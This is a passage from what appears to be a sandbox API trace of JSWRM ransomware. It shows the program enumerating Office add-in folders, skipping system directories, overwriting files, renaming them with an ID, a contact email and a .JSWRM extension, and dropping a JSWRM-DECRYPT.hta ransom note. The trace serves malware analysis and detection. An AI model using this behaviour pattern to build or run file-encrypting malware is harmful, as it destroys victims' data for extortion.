dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0127.104] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=71360) returned 1 [0127.104] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.104] ReadFile (in: hFile=0x264, lpBuffer=0x27a340, nNumberOfBytesToRead=0x116c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesRead=0x345de64*=0x116c0, lpOverlapped=0x0) returned 1 [0127.111] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.112] WriteFile (in: hFile=0x264, lpBuffer=0x27a340*, nNumberOfBytesToWrite=0x116c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesWritten=0x345de60*=0x116c0, lpOverlapped=0x0) returned 1 [0127.112] CloseHandle (hObject=0x264) returned 1 [0127.112] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1031\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1031\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1031\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1031\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.113] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x633d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x116c0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0127.113] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0127.114] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e6a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x51e6a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x51e6a31, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1032", cAlternateFileName="")) returned 1 [0127.114] lstrcmpiW (lpString1="1032", lpString2=".") returned 1 [0127.114] lstrcmpiW (lpString1="1032", lpString2="..") returned 1 [0127.114] lstrcmpiW (lpString1="1032", lpString2="...") returned 1 [0127.114] lstrcmpiW (lpString1="1032", lpString2="windows") returned -1 [0127.114] lstrcmpiW (lpString1="1032", lpString2="recovery") returned -1 [0127.114] lstrcmpiW (lpString1="1032", lpString2="perflogs") returned -1 [0127.114] lstrcmpiW (lpString1="1032", lpString2="documents and settings") returned -1 [0127.114] lstrcmpiW (lpString1="1032", lpString2="$RECYCLE.BIN") returned 1 [0127.114] lstrcmpiW (lpString1="1032", lpString2="system volume information") returned -1 [0127.114] lstrcmpiW (lpString1="1032", lpString2="msocache") returned -1 [0127.114] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1032\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1032\\jswrm-decrypt.hta")) returned 0xffffffff [0127.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1032\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1032\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0127.116] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.116] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.117] CloseHandle (hObject=0x338) returned 1 [0127.117] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1032\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1032\\jswrm-decrypt.hta")) returned 0x20 [0127.117] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1032\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e6a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x51e6a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x426d858b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0127.117] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0127.117] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e6a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x51e6a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x426d858b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0127.117] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0127.117] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0127.117] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x426d858b, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x426d858b, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x426d858b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0127.117] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0127.117] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0127.117] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0127.117] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0127.117] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0127.117] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0127.117] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0127.117] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0127.117] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0127.118] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0127.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.118] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x51e6a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x51e6a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11c60, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0127.118] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2=".") returned 1 [0127.118] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="..") returned 1 [0127.118] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="...") returned 1 [0127.118] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="windows") returned -1 [0127.118] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="recovery") returned -1 [0127.118] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="perflogs") returned 1 [0127.118] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="documents and settings") returned 1 [0127.118] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="$RECYCLE.BIN") returned 1 [0127.118] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="system volume information") returned -1 [0127.118] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="msocache") returned 1 [0127.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0127.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x241308, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0127.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x241010, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1032\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1032\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0127.119] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=72800) returned 1 [0127.119] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.119] ReadFile (in: hFile=0x264, lpBuffer=0x27a340, nNumberOfBytesToRead=0x11c60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesRead=0x345de64*=0x11c60, lpOverlapped=0x0) returned 1 [0127.189] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.189] WriteFile (in: hFile=0x264, lpBuffer=0x27a340*, nNumberOfBytesToWrite=0x11c60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesWritten=0x345de60*=0x11c60, lpOverlapped=0x0) returned 1 [0127.189] CloseHandle (hObject=0x264) returned 1 [0127.189] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1032\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1032\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1032\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1032\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.191] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x51e6a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x51e6a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11c60, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0127.192] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0127.193] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42d8c51, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42fef17, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42fef17, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1033", cAlternateFileName="")) returned 1 [0127.193] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0127.193] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0127.194] lstrcmpiW (lpString1="1033", lpString2="...") returned 1 [0127.194] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0127.194] lstrcmpiW (lpString1="1033", lpString2="recovery") returned -1 [0127.194] lstrcmpiW (lpString1="1033", lpString2="perflogs") returned -1 [0127.194] lstrcmpiW (lpString1="1033", lpString2="documents and settings") returned -1 [0127.194] lstrcmpiW (lpString1="1033", lpString2="$RECYCLE.BIN") returned 1 [0127.194] lstrcmpiW (lpString1="1033", lpString2="system volume information") returned -1 [0127.194] lstrcmpiW (lpString1="1033", lpString2="msocache") returned -1 [0127.194] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1033\\jswrm-decrypt.hta")) returned 0xffffffff [0127.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1033\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0127.195] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.195] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.196] CloseHandle (hObject=0x338) returned 1 [0127.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1033\\jswrm-decrypt.hta")) returned 0x20 [0127.197] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1033\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42d8c51, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42fef17, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4279757e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0127.197] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0127.197] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42d8c51, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42fef17, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4279757e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0127.197] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0127.197] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0127.197] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4279757e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4279757e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4279757e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0127.197] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0127.197] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0127.197] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0127.197] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0127.197] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0127.197] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0127.197] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0127.197] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0127.197] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0127.197] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0127.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.197] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42fef17, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42fef17, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11660, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0127.197] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2=".") returned 1 [0127.197] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="..") returned 1 [0127.198] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="...") returned 1 [0127.198] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="windows") returned -1 [0127.198] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="recovery") returned -1 [0127.198] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="perflogs") returned 1 [0127.198] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="documents and settings") returned 1 [0127.198] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="$RECYCLE.BIN") returned 1 [0127.198] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="system volume information") returned -1 [0127.198] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="msocache") returned 1 [0127.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0127.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x240ef8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0127.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.198] WideCharToMultiByte 